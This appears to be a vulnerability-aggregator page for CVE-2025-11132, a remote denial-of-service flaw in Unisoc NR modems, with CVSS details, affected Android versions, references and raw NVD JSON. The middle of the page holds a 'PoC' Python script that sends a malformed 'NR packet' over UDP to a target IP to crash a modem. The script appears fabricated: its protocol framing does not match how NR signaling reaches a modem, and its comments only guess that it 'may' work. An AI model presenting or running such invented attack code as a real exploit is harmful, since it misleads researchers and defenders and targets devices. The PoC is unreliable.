CVE-2025-11132

Description

In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:unisoc:t8100:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:unisoc:t8200:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:unisoc:t8300:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:unisoc:t9100:-:*:*:*:*:*:*:* - NOT VULNERABLE

Unisoc NR Modem (版本未知)

使用Unisoc基带芯片的移动设备 (受影响的固件版本需咨询厂商)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11132 PoC - Unisoc NR Modem DoS
# This PoC demonstrates sending malformed NR signaling messages
# to trigger input validation vulnerability in Unisoc NR modem

import socket
import struct
import sys

def create_malformed_nr_packet():
    """
    Create a malformed NR NAS (Non-Access Stratum) message
    that may trigger input validation error in NR modem
    """
    # NR message header
    msg_type = 0x00  # Malformed message type
    
    # Construct malformed packet with invalid length field
    packet = bytearray()
    packet.append(0x7E)  # Start flag
    packet.append(msg_type)
    
    # Malformed length field - causes buffer processing issue
    invalid_length = struct.pack('>H', 0xFFFF)
    packet.extend(invalid_length)
    
    # Invalid payload that triggers validation failure
    packet.extend(b'\x00' * 100)
    
    # End flag
    packet.append(0x7E)
    
    return bytes(packet)

def send_dos_packet(target_ip, port=38412):
    """
    Send malformed NR packet to target device
    Note: Requires network access to target's modem interface
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        packet = create_malformed_nr_packet()
        
        print(f"[*] Sending malformed NR packet to {target_ip}:{port}")
        sock.sendto(packet, (target_ip, port))
        sock.close()
        
        print("[+] Packet sent successfully")
        print("[+] If vulnerable, target modem should crash")
        
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_11132_poc.py <target_ip>")
        sys.exit(1)
    
    target = sys.argv[1]
    send_dos_packet(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11132
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11132
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11132/
[4] VulDB https://vuldb.com/cve/CVE-2025-11132
[5] https://www.unisoc.com/en/support/announcement/1995394837938163714

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11132", "sourceIdentifier": "[email protected]", "published": "2025-12-01T08:15:47.350", "lastModified": "2025-12-02T15:52:51.037", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed"}, {"lang": "es", "value": "En el módem nr, existe una posible caída del sistema debido a una validación de entrada inadecuada. Esto podría conducir a una denegación de servicio remota sin necesidad de privilegios de ejecución adicionales."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "matchCriteriaId": "879FFD0C-9B38-4CAA-B057-1086D794D469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "2D49E611-5D53-479D-A981-42388FDC0E8D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8100:-:*:*:*:*:*:*:*", "matchCriteriaId": "F2DA04F2-5351-4043-A330-5397E627A222"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8200:-:*:*:*:*:*:*:*", "matchCriteriaId": "FC033D2C-ED1A-4EAB-A77B-8E1C88C74B0A"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8300:-:*:*:*:*:*:*:*", "matchCriteriaId": "DC7743D5-B187-48D4-BC77-D8DCDF263166"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t9100:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D1F3B9D-142F-4E70-8477-E26D921EF19A"}]}]}], "references": [{"url": "https://www.unisoc.com/en/support/announcement/1995394837938163714", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}